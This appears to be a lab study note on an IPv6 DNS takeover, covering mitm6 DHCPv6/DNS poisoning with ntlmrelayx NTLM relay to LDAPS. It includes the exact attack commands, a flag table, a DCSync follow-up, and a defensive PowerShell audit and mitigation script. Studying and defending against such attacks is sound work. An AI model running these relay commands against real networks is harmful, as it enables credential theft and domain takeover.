# IPv6 DNS takeover

This attack takes advantage of machines that use IPv4 while still having IPv6 enabled in their network adapter properties. When a machine is configured this way, one question comes to mind: who is the DNS server for IPv6? Most of the time, nobody.

With this misconfiguration, an attacker can listen for incoming IPv6 traffic and declare themselves the DNS server for IPv6. Through this process, the attacker can obtain authentication to the Domain Controller over LDAP (Lightweight Directory Access Protocol) or SMB (Server Message Block).

When an event occurs on the target network, normally a machine rebooting or starting up for the day, that machine's traffic goes to the attacker. The attacker can then use that event to authenticate to the Domain Controller. All of this can be done from a non-administrative user account.

The attacker can then wait for credentials to be used on the target network; those credentials are handed to the attacker by abusing NTLM (Windows NT LAN Manager) authentication.

The attacker can now relay the user's credentials over LDAP to the Domain Controller and, if the relayed credentials belong to a domain administrator, log in. This allows the attacker to create an account on the Domain Controller.
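The precondition described above (IPv6 still bound to an adapter while nobody answers DNS for it) is something a defender can audit host by host. The following PowerShell is an added example, not code from this page or from mitm6/Impacket; the allow-list address and the firewall rule names are constructed assumptions.

```powershell
# Added example, not from the original page: audit a Windows client for the
# condition this attack depends on (IPv6 bound to an adapter while no legitimate
# IPv6 DNS server is configured) and flag an unexpected IPv6 DNS server such as
# one a rogue DHCPv6 server would hand out.
# $KnownDnsV6 is an assumed allow-list holding a constructed placeholder address.
$KnownDnsV6 = @('2001:db8::53')

function Test-IPv6DnsExposure {
    param([string[]]$AllowedDnsV6 = $KnownDnsV6)

    $findings = @()
    # Adapters that still have the IPv6 stack (ms_tcpip6) bound and enabled
    $bound = Get-NetAdapterBinding -ComponentID ms_tcpip6 | Where-Object { $_.Enabled }

    foreach ($b in $bound) {
        $servers = (Get-DnsClientServerAddress -InterfaceAlias $b.Name `
                    -AddressFamily IPv6 -ErrorAction SilentlyContinue).ServerAddresses
        if (-not $servers) {
            # Exactly the state the attack abuses: IPv6 is up but nobody serves DNS for it
            $findings += [pscustomobject]@{ Adapter = $b.Name; Issue = 'IPv6 bound, no IPv6 DNS server'; Server = $null }
            continue
        }
        foreach ($srv in $servers) {
            # A link-local (fe80::/10) or otherwise unknown resolver appearing here is
            # what a DHCPv6-based takeover looks like from the client side
            if ($srv -like 'fe80:*' -or $AllowedDnsV6 -notcontains $srv) {
                $findings += [pscustomobject]@{ Adapter = $b.Name; Issue = 'Unexpected IPv6 DNS server'; Server = $srv }
            }
        }
    }
    return $findings
}

Test-IPv6DnsExposure | Format-Table -AutoSize

# Mitigation, if IPv6 is genuinely unused on this host (uncomment to apply):
# unbind IPv6 from every adapter, or at least block DHCPv6 client traffic so a
# rogue DHCPv6 server cannot push a DNS server address to this client.
# Get-NetAdapterBinding -ComponentID ms_tcpip6 | ForEach-Object { Disable-NetAdapterBinding -Name $_.Name -ComponentID ms_tcpip6 }
# New-NetFirewallRule -DisplayName 'Block inbound DHCPv6 (UDP 546)' -Direction Inbound -Protocol UDP -LocalPort 546 -Action Block
# New-NetFirewallRule -DisplayName 'Block outbound DHCPv6 (UDP 547)' -Direction Outbound -Protocol UDP -RemotePort 547 -Action Block
```

The audit reads adapter state only; the mitigation lines need an elevated session. On the domain controller side, enforcing LDAP signing and LDAPS channel binding stops the relay itself regardless of what the client resolves.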

### Steps (run in short sprints only: <mark style="color:orange;">5-10 minutes at a time, otherwise you can cause outages</mark>)

1. Run ntlmrelayx
2. Run mitm6
3. On any event (restart/login) we get authentication, which is relayed
4. If an administrator logs in, ntlmrelayx tries to create a new user account, which we can use to perform a DCSync attack.

### 1. ntlmrelayx

```
impacket-ntlmrelayx -6 -t ldaps://192.168.138.136 -wh fakewpad.marvel.local -l lootme
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FdWTyst9fPOgKTj7wzRdg%2Fimage.png?alt=media&#x26;token=976f918e-a41c-4fae-94e9-477009cdc125" alt=""><figcaption></figcaption></figure>

| Flag / Parameter             | Meaning                                                                                                                            |
| ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| `impacket-ntlmrelayx`        | The Impacket tool used to relay NTLM authentication.                                                                               |
| `-6`                         | Enables **IPv6** support. This is crucial for IPv6 DNS takeover attacks.                                                           |
| `-t ldaps://192.168.138.136` | Target for the relay: in this case an **LDAPS (LDAP over SSL)** server at the given IP.                                            |
| `-wh fakewpad.marvel.local`  | **WPAD (Web Proxy Auto-Discovery Protocol)** hostname to inject into the victim's system, used for poisoning (fake proxy server). |
| `-l lootme`                  | Directory where **loot (dumped hashes, credentials, etc.)** will be saved.                                                         |

#### 🧠 What This Setup Is Doing:

* Listens for NTLM authentication over **IPv6**.
* Relays the authentication to the **LDAPS** server at `192.168.138.136`.
* Uses **fake WPAD** (`fakewpad.marvel.local`) to trick clients into sending NTLM auth.
* Stores captured credentials or data in the **`lootme`** directory.

This is part of a **WPAD + NTLM relay over IPv6** attack, commonly used in **enterprise environments with misconfigured DNS or IPv6-enabled clients**.

### 2. mitm6

#### Installation

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FDSafBuDHCoectakVjEWy%2Fimage.png?alt=media&#x26;token=9f04ff17-1603-4d9f-ba01-06b023f0ff58" alt=""><figcaption></figcaption></figure>

```
sudo apt install mitm6
```

#### Launch mitm6

```
sudo mitm6 -d marvel.local
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FjmIwwuw7aMKQBmQwi2Hz%2Fimage.png?alt=media&#x26;token=83bb1365-cf1a-409e-a3de-3c745245fe83" alt=""><figcaption></figcaption></figure>

### 3. Force an event (restart)

Trigger an event such as a restart or login on a target machine, and we will get a success message from ntlmrelayx.

The loot directory will then contain information about computers, groups, users, etc.: ntlmrelayx has enumerated everything.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2Fb3cOKU7hg1hbndsLQzGp%2Fimage.png?alt=media&#x26;token=d4a99339-9733-4ff3-bf0a-6fa3dfdfa8b6" alt=""><figcaption></figcaption></figure>

### DC sync attack

If an admin logs in to a computer, ntlmrelayx automatically adds a user that can be used to perform a DCSync attack. The newly added user will have Enterprise Admin access. <mark style="color:red;">(not working for me)</mark>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FNdUXqJ7ox8C5zk9glBWI%2Fimage.png?alt=media&#x26;token=d2b0f05e-d3cf-441c-a57e-4a2b0024a1cc" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.evolvesecurity.com/blog-posts/tools-of-the-trade-ipv6-dns-takeover-with-mitm6>" %}

{% embed url="<https://redfoxsec.com/blog/ipv6-dns-takeover/>" %}
